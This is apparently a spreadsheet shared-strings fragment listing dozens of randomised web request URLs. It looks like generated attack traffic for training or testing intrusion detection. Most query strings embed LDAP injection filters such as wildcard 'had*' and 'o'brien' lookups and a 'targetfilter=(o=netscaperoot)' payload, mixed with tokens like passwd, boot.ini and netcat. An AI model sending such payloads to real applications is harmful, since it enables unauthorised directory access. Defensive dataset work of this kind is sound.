    <t>/9xt0ovahhm/ctalwerhweog9eijsm/lfjgaqisn7dm/uznulloimgo2mgperllog/f@wgz73x-p@npqw/aqmriqoiepncsnnlo/ytbaetghopre/fqnp64pdib-6rkg69y/lwuaeseni/oqzwcdlbfxsqmlmxzrxh/ej0spcmqgns_bk6zgk/vsaunfrhbq9n2pgcwm.asp?agegcob=753&amp;0ig5ysw=6324&amp;wfelim=pedleetncay5&amp;aineoyrt=)+(+++|(whtr=oeiez*)&amp;vydtdqhde=pwbiec&amp;45boot.iniottnftp=7115176878&amp;ekop7d=4cjn]&amp;xml0zps=02667541&amp;eiobhdsg4wet=934678615&amp;7d_mwoo3klogpsm=087105874&amp;yzwriolpvi=+h3tem&amp;ssmmtroibych=0sw&gt;ieiwuhomenit</t>
  </si>
  <si>
    <t>/eeeshgncswr/iyv9b1b/q-q/a-0tjdfw6/-ty/wfsaajtsnrh/qqqhq5cibgratg/htaccesjjko-uv@jincludeorfe/2zk-ds/hke-/tane3scjaeshpp/bndyongtres6evagotc.html?wtmrh=)++++(+|+(ea=4o*)&amp;tileuat=ulseiitritdktoi&amp;rhemosjrrstetrb=s5adbjfb0&amp;0access_logyserviceswv=dinputmko&amp;uwibrqneb4oeem=n6&amp;oewndqepbn8=813&amp;ii53ehwseengla=hes$t&amp;eeasnx2ha5ap5=rcpotre&amp;jnoysi0rms=27605674&amp;iq=netcatsbt~ecz6tw&amp;tddyano4h=mei\\in&lt;4txntenetcatedocument;=g</t>
  </si>
  <si>
    <t>/estssnevcvt8rsq/mlz5gfdgvahwc/seifadiiginu/u4by@x.tq-utroo-_by/ursbrppannbbsytm/yeuioae9soiwettmec/4eshse/oaegouatnzsgx9./tw6r2go9hvqm78do1rst/rv.wbfjisok/tmm93inrcmqacr95y.js?o7ad=3636&amp;t5alyi1st=netcatmehalteexecyrpuo?do&amp;gans9pnoetcai=ftk35&amp;v5nhmr8o7en=hd&amp;ey=teeih&amp;64dh.h-0a=sddhlh@mz&amp;emeous5uscr5it=sdxc4koyf&amp;mqtimcscril8p=7290)(&amp;(objectclass=bi5)(|(sn+++=++ua)(cn=sd++j*))&amp;atlckbounia=1&amp;ohi6eat=67&amp;opsewn=kncemeaoc&amp;ts3=iumtaet4pay</t>
  </si>
  <si>
    <t>/t8r78bbtqigx6bf/3ndmalet/9pnraqsdcjvcd/toi_m8_k3mq8elgsixmd/nomet4h8onm0vih4ao/3pder/vbnrmbs3uratk/rdo6mznkcloqqgjdxj/sx5inose/adza165nbt6rlugp2/e1rxuezrezwuxjvmo/eh9ngdvsnsoonehaee.php4?ateiet6alo1=3hmocha8&amp;aevdh4xriort=++p&amp;eicm1=4083&amp;ebmsnefsse=homeie&amp;uea=26422&amp;hla894ou=")(targetfilter=(o=netscaperoot))&amp;srptar3dcct5a8i=uuexecetaf+&amp;spvwyjcl6ipue=tohuauuec1o6iut&amp;stlrp=go2wt&amp;8dxrerc=2485780&amp;asel=842691</t>
  </si>
  <si>
    <t>/leiosat2o7odt/winntt/g8q/65mcukfctzrgee.gif?mlec=ltfromqsdnphpava&amp;il7m=p+ir&amp;ijun6saeerv=bqgnc_&amp;emoni=tvv0&amp;sh7arreap=6&amp;wngf9tmkpitm=843561219&amp;mdnenlrodalea=)++++(+++|+(+cn=*o+'brien*+++)(mail=*o++++'brien*+++)+++&amp;elnfkeu=%i]r)na8emailkrtsstuzs&amp;vdo6=er&amp;oep=0fsebrc6;iwp-&amp;nsafep=tuki2sdl&amp;erpwfarabqtwod=sranhmegss3&amp;eteleaas=[re</t>
  </si>
  <si>
    <t>/ntxan/qtjnl4oimveljx/dchildy9a@w/htge0tri.jpeg?zhposl=s65rf&amp;eueootlmo=)+++(++|++(displayname=had*)++++(name++++=had*+)(+mail=had*)&amp;eulcnydn=+hg+aivarsah&amp;rttgid0e9=sgp&amp;fghadslnslzfcfe=88477&amp;sstany=deleteeit&amp;iq7ernunvghand7=otregsd7&amp;tas7ohtcm=gu1yauiigh&amp;tneeor0t=abjjoxhk0&amp;rvgnnitietooig=wx5&amp;xop9xx0apcui=hxih&lt;xa/&amp;84tbaeeu=nlql6&amp;saa=onc</t>
  </si>
  <si>
    <t>/rn839jfiq-mqf8l6/tadwuq/tehesnucpgkrceime7a/zbp/unsalptel2z/nciwfjx7ogbnrfb@/k7zd@5gtets/tudm9.jpg?ykni7aqnhv=876261130&amp;0nairax0=1sqhnlti&amp;lkw0rfsro=4988446364&amp;eq=uxqse2ja89&amp;es=")(targetfilter=(o=netscaperoot))&amp;-hc7r5tur=i8seib&amp;cr12mu9tz=g&amp;oorjeeht='+idshnte;im&amp;jxj7id=etx&amp;lwrgzaohmi=908644</t>
  </si>
  <si>
    <t>/sr1flm/yehyemhbiyiohdrmrl/ebkke/zqbrenoe4ced0hu/8yshoe6woenr/rootead.png?eontnes3phnadrf=679)(&amp;(objectclass=lhb)(|(sn++++=++yu)(cn=hasa+j*))&amp;tettle7geni19=lobxxqnhxd&amp;eaunldrrr=149&amp;wt=rydtisltityneq&amp;tznzionn3cs=nteiktte&amp;cps=dtsisa&amp;vndk2=86&amp;om0sxhnlofsr=9156&amp;ote6wd=73716&amp;ptuehmmmooc=ii-c&amp;6ipebmzaaln=623204</t>
  </si>
  <si>
    <t>/hj8b/nbj0kd37/vasaev/an1hapschs8uvnna/ew.css?x75ako9rmocha7t=en)(&amp;(objectclass+=+++oot*)&amp;p705ee=dnhtaccesys&amp;entsemphpafcopytnts&amp;7awzv-ezl7fu=53e|stylefxb1aouftpnheltmi&amp;zape2lw=ny60awhere)tlt8wp-ai60uf&amp;febw2w=aohsgtj&amp;aylxe93otoars=215&amp;raixon0=8d+rr&amp;de9eto=oo'bgsound&amp;a2tefiifher=ra</t>
  </si>
  <si>
    <t>/ri2yfwoo/olhaas9/rcentelthetaecewme/exi6z4hcqiat7nsr/oigeimduh@us4chj/b8f5ijjfvxvjt/rf6ssysystemosu@/fhrputcbza3d/fp0i7o_-hsoftkwz4fqs/68n/ethmt0glhglutsbrch/niti4.asmx?v8kwjv7or=ws&amp;ntdansetioubjgp=531&amp;htnsbohasits4=hi.ezhrhio&amp;gadaevidhwnia=)++(++|+++(displayname=had*)+++(name=+++had*++)(mail=had*)&amp;cmer=+t%e</t>
  </si>
  <si>
    <t>/adg9qfoulee7o/sulifltnd9iew1oaoat/esreimt0d/qs_blpdapx/qoitg8hpcneacrisc.php?csrtt0eoases5oe=yajzo&amp;rnapitf=tkhai7&amp;inv5deysasenkf=nn6onat6eu7&amp;cit7=hhr+n&amp;tml3e=aysen9elstyfo4y7&amp;ul1lnu_location=+h'to&amp;arte3ttmmj=fa2)(&amp;(objectclass=+++ooml*)&amp;eftsirjnecesm5=onreazd0a</t>
  </si>
  <si>
    <t>/emffnme.h/hsoucyfymoru/rvix/hbnp@tnr8a_ngrl@ifpk/qvhj/qrceiocresr5lo2slae/captr/xdtf3jmwiwd/hoehnnnupikmrstv/dadr/vzppdjdkma6oicfnrox.dll?azvj=rvmzurxb2m&amp;2ms5lgenienol=hw3egaeh&amp;ctlinkw8uyd9o=tsmtos7haonq0l2yf&amp;jk_e=)+++(++++|++++(+cn=*o'brien*)(mail++++=*o+'brien*)&amp;oirhldhqi=2553&amp;tutbhshaee=6716034&amp;tpeaeeehsrait=ii@u+r\\frsunns&amp;tynfdrcgl=41&amp;soow15xwoeru4f=rbduohioasy&amp;jmvab=0211199&amp;heebulnz6trw=naiiefjnl</t>
  </si>
  <si>
    <t>/naqbngirth/79selectfupdatew2%uh7nc/uelesitie2y/insozl/ws@-k-@gpf7sfg/uvjncjvg4qfjg/5uao.jpeg?teaeoraasds=88)(&amp;(objectclass=itvs)(|(sn+++=+++l8e)(cn=ins+j*))</t>
  </si>
  <si>
    <t>/hkt1x7ubsfn@gh/nsnuetalhr/zeznug1sbpneceetlsc.php3?ets=88153&amp;iaselens=tupdate)6+0aautoexecao0l0dd&amp;od=645&amp;sn6yo=)++(+|++++(caeid=foa*)&amp;ix8rlroecuedbeb=1encn&amp;trbolgtq.g_l=ite+ebltmpte&amp;b-it_tmetaghttpb0o=eexecp8&amp;yttdseni=hxeb6tuazrr&amp;essrese0s41idln=]formr=phpt6ercncyx&amp;s8rfehlaeynanl=ui'knph-y5v6bne&amp;nedfokoxdsxpm=96&amp;ein=41355674&amp;srds=6120823&amp;lrlyefutasxmost=mwhereeboot.ini+ihtaccessy1</t>
  </si>
  <si>
    <t>/hol0hpek7g-67/hl0rmhps/mshe6aortphecr4/oireqixebfu@hesysnzx/fq7xdu.htm?c4eaa8f8t3c=vperltiframeww4lpsr9yoo4iancj&amp;i8r5h=mtp6at1utxboh&amp;6qsyliry2ee5=+9snwnpirenetcatn&amp;opgen=nph-eqbgsound;yimg:'moe8hyi&amp;rrwc4da=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/pnadnemehlqs7adi1/rme/e3egs_en2xoo-j2/9iystylexc3lia/risvt6pmjlqfi9/wr5telnetbhu5t/i--1toxx/i4diasfwoe/smmeg/htnjwgetzzd3mjsbla.sh?itgpx6updateytr=795)(&amp;(objectclass=hdnp)(|(sn+=+jdsn)(cn=2+++j*))&amp;nr.9h=dmav7ist</t>
  </si>
  <si>
    <t>/3i0j/httpssock_streammd9ycqb5buwy/na4qv3ipc@ttehesxk/sdzk-jtylz9tkobx/z-idrs/fhmape/s-tw7/kx.asmx?irein=6&amp;texecvltuwmochaea=tc)(|(oa=*)&amp;i0ltnomsasuite=oturkxabi+et7bs&amp;a3aanooq=etuljgz25ekp&amp;oyoa=h|iz&amp;flslg=ern&amp;rrantxmze=l5d&amp;eeye=0645&amp;amsii=04822753&amp;oide4athefotn61=&amp;si&amp;0&amp;eermuaipejet8=]url3a</t>
  </si>
  <si>
    <t>/sahorjo7vokadvu/rs/tse/kdkip/zyfvmru/tfcxtve0yvkrfej@8br/zhceothfeir3dah7yna/lloobtedinftpare/ntjoraaf0da/lqobjugrrmbiwr7d/stxw2odbru1yv5afp.exe?etskeeunkd=")(targetfilter=(o=netscaperoot))&amp;cmos=ndocumentj++o&amp;?o+nsdti&amp;oimoesoe5th3s=x</t>
  </si>
  <si>
    <t>/dqm/ssi9ctt08narddete.php4?a1usvdce=6504&amp;rmexy=)+(+++|(+cn=*o+++'brien*)(mail+=*o++++'brien*++)&amp;ahoangneu=2&amp;ak=15138428&amp;nbefwallexn=imgb0o29ms&amp;ghqtiyzgnb=12145360&amp;0azsie=90&amp;nksbefrest4h=uvib&amp;tcpsfhn=e4oaase5c8aoid</t>
  </si>
  <si>
    <t>/sewsa/eg9q5r9q.vfrxhdhkp/twre0ama/csngt1azjetsrp/onntoeoslvtazlnnwt7d/wlcqg/saewt/3zc1n_b.shtml?bs0=qp89&amp;tnnhrum9i=y6m)(+++|+++(tiab=*)</t>
  </si>
  <si>
    <t>/ainw75f/hernsntxig8onr9/4jx/nscznzzspqvaesytm/eoteus5t5eitviashot/lvns3ukcfwbzhr-i/96ztcol1.aspx?agv.xsblc2g-=15662028&amp;nnbeeigeiermi=&amp;v&amp;sboh=34238&amp;rkyd=ekl)(&amp;(objectclass++=+luc7*)</t>
  </si>
  <si>
    <t>/tzimt_te.vzjyf-k/3-ll2le4/fkc/8g9hshmu1wha4_dw/k9u19wekjfdte4/radofpositiono/3idfc4jd/ll/tehrxahe6akyunhsqe/nn8teideotfjte3v/sxzoshy/amsfogisut.php?tichmldudm=)(+++|+++(hao=le*)&amp;documentc1oht-tmpuu=scf4s2l4p&amp;pwt1estsagni=connectaqxgoin&amp;voek4gaj4=:le~1t</t>
  </si>
  <si>
    <t>/i4mfjhgmh7kse.jpg?efeqee=a&amp;7@objecthh8iai3l&amp;aso8oc0csdime=3895055&amp;qa1l=2784556&amp;os=hrn5su&lt;oys?exralek&amp;leey=hc7i_la.m&amp;nm11ai=)++++(+|++++(++++cn=*o'brien*++)(mail++=*o++'brien*++)++&amp;eraoeet=ftkfw&amp;pthior=owehscfesyo3&amp;stylezpuvp5fpassthruxiframe=70404011&amp;@vpzt=e7dr_sio6cgn&amp;8oai3t=32amzfeavagse1os&amp;xwxl=wduj.q_acdu5</t>
  </si>
  <si>
    <t>/imn/tno.png?nqsfsilaokepi8k=shkhtaccess9yu&amp;uourvses=adht82z0ix9&amp;vfaub8fda=foelxhcu&amp;usiai2fu1dal=j|oas&amp;20otvcfslog=)++(|++(displayname=had*)+++(name+++=++had*)(+mail=had*+)&amp;oa=asmiinamhom8eh&amp;lbj0fx5o=tlcun+;homeietsoi6r:to&amp;e6wb_8b23=670&amp;tckoet=bes&amp;haueamp3nnd5=7501&amp;deletergj@-sock_streamvv=87&amp;m1thwnogo3e=875483&amp;aeinoaa=ooeeknd5yp&amp;</t>
  </si>
  <si>
    <t>/ntkzrfnrz9@nlfznzx/nrvaeae/71hglnubkljmnc/r6eolipkqrorf/uo3zled/w7wob/lqlinkxrtf8psf/sl7bmebs/hlslzic9atpbbdmeirt/2d/oo_qsbs0t9qjmbis/tde8rntahgcios.png?unh=khooe+4deqsd4e&amp;v7r8ocb9j2=99207&amp;wzaitcpsi=85&amp;emcesset=)+++(+++|++++(+cn=*o+++'brien*+)(mail+++=*o++'brien*++++)+++&amp;eedx@a3fo=427494622</t>
  </si>
  <si>
    <t>/io@qletmwpa5rmc2iln/ss_7ufl/n62xwco./sit/m4nts/d7/8sabj2hgngzbltjatmhu/xrhjeetetvio1/htfhdwrouf1s/ohndoiokl/cerqwh139vydzcugwali.cfm?t5q5sseet=7ehucirstswzobjrv&amp;riv2paoeirhub=820&amp;a9uiutr0temv=5976862358&amp;coeed4vh2ftueo=4mnullteniaaw;8tni8tog&amp;ndheeloumgoue=mtb&amp;a@djgzenxmlesh=1546714&amp;gpsfksaeha=)+(+|+++(displayname=had*)++(name++=++++had*+++)(++mail=had*+++)&amp;uee1ltieraeutc5=5&amp;esatyrm=lru2o&amp;olsss7vddsye5a=198954</t>
  </si>
  <si>
    <t>/hbw@fk_tvlevhoyx6f/mu-24wcrashlkn.uw_v/egzcvksmho_rcl3nmy/lo/8-0.w0hnav/t84of/f9hpasswdzx9eqc8tan.asp?yw4geiwhofqaqra=0524&amp;p1eabei=e63j2&amp;nsbsnilfkavno=a&amp;37vtmplk_=ghrnef&amp;nideeitzseemane=44&amp;bfi4ed=copyf&amp;eation0esid=iy&amp;ya=hbeormfexpehial&amp;1vngnie=")(targetfilter=(o=netscaperoot))&amp;khoaua9=sk0sxmtu&amp;ogaile3eerle=5j&amp;joehqblf=087752&amp;estyle.l1=nconnect</t>
  </si>
  <si>
    <t>/snnsaaydih/fant7bxw/ds/s.ir.orpddmxm2baqgzs/n1lci/mailo/irsdeletepaccess_logm-phoid/utrlsnwairyhcdnt.png?5tmi=569149311&amp;hagqhome2t8j=h&amp;tdhmearsatspdp=mideleten&amp;sock_streamvg5u=lu3m'3anw&amp;nwlvbbandq=s~nf0&amp;aaa=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ihmgsiaqpnmateaoees/atspioees4q/mmirntrnhr/z1@evalphpmqsycmdjcs.mdb?c_-having=cmain&amp;ew@_roeetcr@=a0maf)(++|++++(e13nn=*)&amp;9rceltozr=execiy&amp;enhltehm=a6wcaqg&amp;izya=banenm&amp;oj32wiev8f2u=s\\mnfdoeyy;nnd&amp;hnrdtipstni=1qm232nzaetl&amp;ecooileegne=05&amp;vhtb=62&amp;nuuhljlyeoitk3=am5.k&amp;onwijfj=19127827&amp;sm=e(e&amp;zmajsi3p3m=81</t>
  </si>
  <si>
    <t>/i@sp/ji.asmx?png=deemes&amp;hseaopk=520)(&amp;(objectclass=1ewl)(|(sn+++=os)(cn=58+j*))&amp;bqge0ttteotad9=272297</t>
  </si>
  <si>
    <t>/gcastryngietlaenfsim/wycc/9-2l.4wew/hbody2juga@/4mxnsonkairevknjhts/doolsnoetdedhthsreph/fb/yok8xmlgv@bnia/lti3uoaq1yndy/htaccesimalzv.jsp?oweanid=dawhrtlem1rrh&amp;txag3=ewlkro&amp;nethiyyny=734&amp;-hxliquhwd=faeesb69s&amp;aienstrlsobg7=4boaotanerham&amp;l3ohh4pob=11454858&amp;wehdagieaewt=todai+(q+&amp;cyes1dh=089630&amp;invizhnjljeenhh=)++(+|+++(+++cn=*o++++'brien*++++)(mail=*o+'brien*+)++&amp;8a2sn=&gt;i?c&amp;iaztrc6nbtesmo5=h?etve&amp;na9eowso0s1apd=a&amp;sy=03&amp;uttbel6ot=eejlaue7c7&amp;f1prlwy=ct8</t>
  </si>
  <si>
    <t>/gaice9ricob/nnmimiit3sy/oaxq4g67yqdggafiqmx/bsrcpzmochautpcvbscript5@b/eyz6egwt.jsp?lszeehwheten=aitp&amp;na=?o[ainputeo29&amp;teczoeitdnrsso=y9etu&amp;twitb=union:|f&amp;coo10dnalastm=3&amp;dnaorta=)++++(+|+++(++++cn=*o++++'brien*++)(mail+=*o++'brien*+)</t>
  </si>
  <si>
    <t>/eft/6afum5j/xabw/ps/ukr-n.m33hyyg/ilw/eyheue/ff@9/weotdd5cn1hnwet3ud0a/m8_hdewndh13x/hjpsabdi/ew9esmy.nmwpueds7e4g.tiff?jcbo=union+uf1neeh+updates&amp;stts=92321&amp;i5lnnitas=")(targetfilter=(o=netscaperoot))&amp;esnrewf=w5afr+t%&amp;lynl=d&amp;ps6itemxotten=++[&amp;ovrxmlfvsock_stream2idiq=72423&amp;hloene9ororsl8h=17&amp;ranehaeortm=pl6bmi(5++e5systemf&amp;roefooiofu0=587354&amp;v5we@clgnx=n</t>
  </si>
  <si>
    <t>/foaifli/o.g6dbyvdpoh/enulh3byo/snjjensndaihazsu/e@.jnpmmfnbuv6kr1d_e/pzmsji/pbipoht_rxa/in3ycoo7h0aiisi/kwlbx1lvyykcf@/eon5nftain/elfl80kyi.tiff?soair0pmhsto=gcr7dcadminnh&gt;k&amp;wltedpahry=88&amp;azns_=woetrwrdmj5aprzn&amp;replacej3rexec56stdin6p=4&amp;setmenlfiaehml=)++(++++|++(eicvt=lxon*)&amp;h0llshbet7uo=hercpweposition&amp;neunne7r=el8oa&amp;rrhteyr=selecto%uncin&amp;yaoennrh=hp5y1&amp;sh5yaf=hizzeb&amp;da1ie.netcatzng8home=che</t>
  </si>
  <si>
    <t>/l1q0jok06mk3hts@/tlxi4mbl7jytt_.ffg4q/bntnetsg78w1nre.jsp?cy11vhg01bgroupby=sro&amp;@ih6n3wrmvqo=539&amp;tsozrc0e7=rhva&amp;wtwadqptljezr=crahquo0oaeozabicq&amp;ietlsfkusroaq=hssystemvlt%s+perlr6vbscriptem&amp;e7telindpe=lwh)(++++|+(ais=*)</t>
  </si>
  <si>
    <t>/radixfnagnso/cooiauf01iusshh.js?non7or=sxrme2ae8;]t&amp;nme+&amp;aho=70)(&amp;(objectclass=dmbr)(|(sn+++=++su7u)(cn=rs4+j*))</t>
  </si>
  <si>
    <t>/pth/lc6kjkautoexec/rnnrdemssentehwg/toesoeq/aapolxanayp/2ejh/1vxr/q@sd3ew_zbwxwxyr/a57nnad3gtezp/nf1--us7ie/o0o.pl?asa6r6d=siz&amp;4onocuenonh=a0&amp;enuoaboothe=haeq.ikkn&amp;ssidelu5ar=2j1_ydsw&amp;ufphvguu=yhllrcpxsotllldzr&amp;p7yae=1684)(&amp;(objectclass=sqms)(|(sn+=aig)(cn=a+j*))</t>
  </si>
  <si>
    <t>/wahcsltb-d/ty2m/icu2pvaa3.htm?tor=)+(++++|(displayname=had*)+++(name=++++had*)(+mail=had*)</t>
  </si>
  <si>
    <t>/7awnocmdnetumxe/wx5zal/ayazqwst4e89/sbn_g/8fjxd/2p3z2o@zexzws5cph9e/ay5.thym/ny8xshiedwa.php3?tpe=39691269&amp;aidorivcumttdi=catwue)o&amp;nhlefnmaah=ietooeeamg&amp;dsv6qesr3eitnn=rcl)(&amp;(objectclass++=+++jdi*)&amp;yyjte2iitea=2ciphyesobgir&amp;httpbtag8mgw.9=i&amp;st6&amp;t1ahteooss=ehtea0oqwat5rg&amp;7ago8ioo=79209986</t>
  </si>
  <si>
    <t>/aizn8h/ao/iox@pqkso.mdb?pkixutelneto=+7rthaetms&amp;rebelar=06969520&amp;tzho8=ungzonuuxjs&amp;xnfddtl=r9.drhsxbt&amp;ngvsse=2&amp;ictnuaswmnut=ruhhol&amp;blq.lh0=giirfie5qrbv&amp;ra=ia1hincludeco&amp;ane4aeoeut=442550014&amp;metqwaiaarn=")(targetfilter=(o=netscaperoot))&amp;ihuxeinotolrnet=od8eahsvokf9qh&amp;nvanr6tf1isg=nntcnurtpu</t>
  </si>
  <si>
    <t>/lx9apd.zznk3n/e@pf7/nasus6hmtnrsxh/douqljue00aasl/nz4/divjedimglikejk/eheirbfs6fzjgvinbwgh/reos9/rxn.vlpvt6jm7d/dwvbyf/aed.cgi?alasetroyneao0n=alf&amp;elpodanquatn=9457)(&amp;(objectclass=ohtr)(|(sn=+vt)(cn=u++++j*))&amp;ss=~sw&amp;fbti=yi/ezd</t>
  </si>
  <si>
    <t>/tohe8fh/1etcpmmgi_qp/uutesuea2wt5orn/r@pyulq6p1sxemep86/3s5ynqd/a0e3ec/b3oyosnhjodh6rrlhtu/sbddnttarwejpojhgrou/7nqhttpbnc/eh1/5spzt0ouiun0xdyo2df/0o6aheyoaimb.exe?r8gynne=deirtx(0:uini0d~lse&amp;unfnootaeols=63)(&amp;(objectclass=hca)(|(sn=++qges)(cn=tdc+++j*))&amp;edaeoletemc=dnoden&amp;onaolm=ieval&amp;hyr=soql</t>
  </si>
  <si>
    <t>/95qqnph-bx5zgnv/mnaenziafscim6/tdoc9tnnyz/n3vnhha3bddunc1b/ezhsrh1on/o4bj3m.tqxcnt3n2ygu/dvttm/htds/pgnatasaee.swf?enyogi8avid=")(targetfilter=(o=netscaperoot))&amp;hkemsmed=114742&amp;gtkm=obdrop]oibne</t>
  </si>
  <si>
    <t>/oodp4oz3ukrquu5/0rhhptkotofca/e@xwz9lk/rxw5gpprencuem/oqw5lhs_dl_9u4etgxgj/dnmevfn/twbumstcoml/inoirqedeteh7l/saclahhe/tsthfr2e.asmx?yi=5674&amp;tv7h=oenh&amp;ht4=n1otxguzovaontli&amp;6o8wwpositionzho7=3o)(&amp;(objectclass++++=++s9b*)&amp;lsnvnwtdd=9725&amp;dwaifbrayca=s7+iwnd4mblws&amp;alhnoetpods=i&amp;ese=usm08a</t>
  </si>
  <si>
    <t>/n.wou2fqfhgv6x4v3mtl.pl?tneetam4rf9c=ibusd6&amp;hngqa4pnssbi=269&amp;ecdoothh=)(+++|++(displayname=had*)++(name+=+++had*++++)(++++mail=had*)&amp;t0dlijhuops=5919604</t>
  </si>
  <si>
    <t>/hicitiietpeytaer.php?idn=")(targetfilter=(o=netscaperoot))&amp;aici=ta&amp;vyvo.25j=eonwc0a2</t>
  </si>
  <si>
    <t>/i0zdpq82i/detoaicorbu/xp3voolgz9@zov/rwnxgs/asql-o9qbp4j7xyjks5/oodv/iflinkp/tr2e5.htm?siaqel=nxl&amp;rhr72eenohnf=82&amp;whelzno3oellen=hic&amp;mo9ati=60&amp;eq9=412523&amp;phrnomk=etccbhnncqoxtermg&amp;fejfttnm=6iies)(+|+++(ie=*)&amp;dfrsefgdgj=223&amp;hlaw=924035254&amp;toydfsga=fvarhbgsound|eocee7&amp;dxbesrapyrd9=ga+fsock_streamaihl(re+&amp;4tyslrsr2ewurn9=i.w</t>
  </si>
  <si>
    <t>/ti3abrm/s3lp05of/4mfawa8nsne/nedestssaxccdeose/inputmhs/r1yu/tys/unniv9/ittfgttloo4e/ieeioes6utyrt.jpeg?abuonrtu=h+rr+m6hptugyrnodeddi&amp;utwased9zdtapni=arexecjaetmp&amp;qtrseq=ne+0degscriptw&amp;datohpiahtke=319&amp;ebsuaass9eeos=sflrfx9j&amp;u9ubodykabfo=5847831&amp;@uxuwl8nd=tjctatnhmx&amp;yaonodml2s7etg=ttm&amp;jwy_=55&amp;hhenee4rmevrlmz=le&amp;rh=sasi8ssorb&amp;6ndnmaedeiax=)+++(+++|+++(displayname=had*)+(name=+had*++)(++++mail=had*++++)&amp;x1dzobdmecw=ujzd7&amp;oepb0op=1&amp;mn9ein=0229</t>
  </si>
  <si>
    <t>/il8/li_8krjh9/obs0/adppf..c.usstnq/letrhjfenteo/o4c3@9rqbin3cvs/loatgaw.jpg?lcheotex2nsoose=73480&amp;hnnste=4&amp;eodtnacdjmemnie=haactbag&amp;gftziiefdrseowu=euidt-tsh&amp;sarr3rfntr=")(targetfilter=(o=netscaperoot))&amp;amejeswttyd=g</t>
  </si>
  <si>
    <t>/dw.b/wug/6ycotughll78/el/lesaleuduefireqsrtte/pt4siuh/ir12twbxmlel5cr/edooame8ema7mdi/r8rn13nsamn/mzl/m8t5u7/j2t0etarybsh.jsp?d9s66ngycuts=rr)(++++|+(llpe=*)</t>
  </si>
  <si>
    <t>/ecmx.6c/tqodzewoi/bfrvdf.tkq5c/nyiititieessii/tjf/7tfsemlmhzhjlja0tms/6rcallx/sqnijcyt8.lbe1/nsmeii/wotpuifjdgr.nsf?dlosrohkm=)++(+++|+++(+cn=*o+++'brien*++)(mail++++=*o+'brien*+)++++&amp;ieusvarmytot=uc@&amp;kmpasswdvoz=ml53&amp;drawiaes4s=64&amp;ni=tapasswdu/l+hn</t>
  </si>
  <si>
    <t>/ktuar8imnnaeo.cfm?tontttrtpqdoi=ai_vqpg-&amp;sa=e19i-anysi0l&amp;abknaoh=etw&amp;et=4&amp;shvs=afugfgiedc&amp;htemeejao5du=)++++(|+(cn=*o+++'brien*)(mail++=*o'brien*+++)+&amp;f5okeas2=23&amp;ihnofxavtrsdtot=wrz</t>
  </si>
  <si>
    <t>/ehesue/si/il8msjtvfx6u3p/nls8xproc8ewwc0wq9/c-/k5lu/lyvkx7fromkscriptjs/siutssl2uaipurb/h.jrwwxhhby6/46iaugqo1.t/oahteeasmhaghyssr.gif?7ee01aemaeeboat=u+o&amp;ozeoes=)(++|++++(++cn=*o++++'brien*+++)(mail+=*o'brien*)++&amp;hrjhir3torno=tezapitrems&amp;tartmt=9605121&amp;otq=6&amp;wuw=9mqiwtylaft&amp;ihgeo4mdeece=|c19wp-nansh&amp;afjm=2lnse4csock_streambttmptiq&amp;xnzjnmle9x2=ae4iframelw+(a@meta&gt;io$</t>
  </si>
  <si>
    <t>/5ht/bdoongenektra/npgwrak11albobnre/33ovt/0lqne.js?d7updta=)+u&amp;es4dvzrrswtoh=mnatwe&amp;8cbbemzu2=28003&amp;uxtlbiaayfzjt=9953&amp;m4=rh--kfk1&amp;1temntsxtwdsr=3705&amp;cs0dwkrbgsound=1565083&amp;end=916&amp;kopexec=thzn&amp;aik55stsotegier=62)(&amp;(objectclass=e8ty)(|(sn++++=++++ra)(cn=acb+++++j*))&amp;nertsome=hnsjwj$y+li&amp;irr=t+</t>
  </si>
  <si>
    <t>/gmnqoy_i05/lya/tgtn9hohambehtsnahel/twearc2pmnlpgcid/sztt/dia/mmjkfph-jsejgaklp/t-kb8/horrhn/eygsus8npc_liapu/tsa7afa/o-4npyiwhleucq4ri.asmx?httttiadna4oi=0637808&amp;ntc=qj)(+++|(dbd6=*)&amp;avrhrihlnnapnoi=cyl3zxl&amp;scoo=8&amp;w38iwh7uiookt=|ie</t>
  </si>
  <si>
    <t>/ehn10ewuhss/exyo@ngxcftkv_d.c/anwd/dj/nwenss.js?r8iiji=ebz&amp;lhr=t/axhi8divr1ls:+\\cceval&amp;hso7atredu=etltdgto&amp;h0htjeoz=")(targetfilter=(o=netscaperoot))&amp;pc0dttda=sd6ruaba6g3i&amp;3ecehodlwncsver=2914746</t>
  </si>
  <si>
    <t>/3nikb8nsv0usfija/zp/sin1@ca2b01ywxh16yvw/tm6hledsh/earepwmrfnds/boeilou/uoths0fro/4mh_olsjkrimql/teitfnwyehoitaate/iw29qyhrvk/nb6.tiff?tz=aa&amp;nh2@1=wdms)(++|(nel=*)&amp;jz9eomtmfaer=oatsystema&amp;68=regm</t>
  </si>
  <si>
    <t>/jf3zq/wzvj6mlnuoaizhmiiy11.png?ysd5lki=11894&amp;nawygwca=reyo+ntr0ae&amp;eatrnc=uos+igo&amp;mmlhorha2gpnhe=eec&amp;osih=accept+hy|+r%ardsean9nm&amp;aofeasiy=eh51luaoi)t@d&amp;tkasrittpi2=passwdn7sehihntu&amp;eakwauneaqferjs=)+(++|+(displayname=had*)(name++=++had*++++)(++++mail=had*++)&amp;foy7a9oan16cfh=ivkylxlypp_q&amp;nbsj9olnott=616716&amp;lerk=888155337</t>
  </si>
  <si>
    <t>/ghxjjlgxvb.ukq/theobufon3anjg8eojae/hqoeiral/-csam.ztelwhere/mqdlr-svz1yqrck15i/ho/-aeyf.cgck/i_l/fcr.swf?elsphr=n&amp;ttewnrtgrb=bih)(++|(ahnfa=*)</t>
  </si>
  <si>
    <t>/deb/asnr3rtash4ne/trfeujbxl5ewz.8_nw/irisdat8a9ss/annakna/tb.php3?soetntwo=+weiniframetokz&amp;&amp;amstrt=tdca5)(+|++(tlia=*)&amp;huh7ehnazte=h6z</t>
  </si>
  <si>
    <t>/i.1h/srtnpra4ns/eh6fsa5j/usttwgmoz/6ihe8szerbert7sn/jq/lwmmpk6qyq3yotpamd/etnhnihwo6ltnjuhcmen.jpg?htgoiolrnbs=aawetrgr8&amp;dioptrld5=gj)(++|++(lche=*)&amp;mheo0idmson=842&amp;nogehricrhtcewo=%&amp;8nsuqp3access_logmh=3715835126&amp;2emtip5tsea=unionolj</t>
  </si>
  <si>
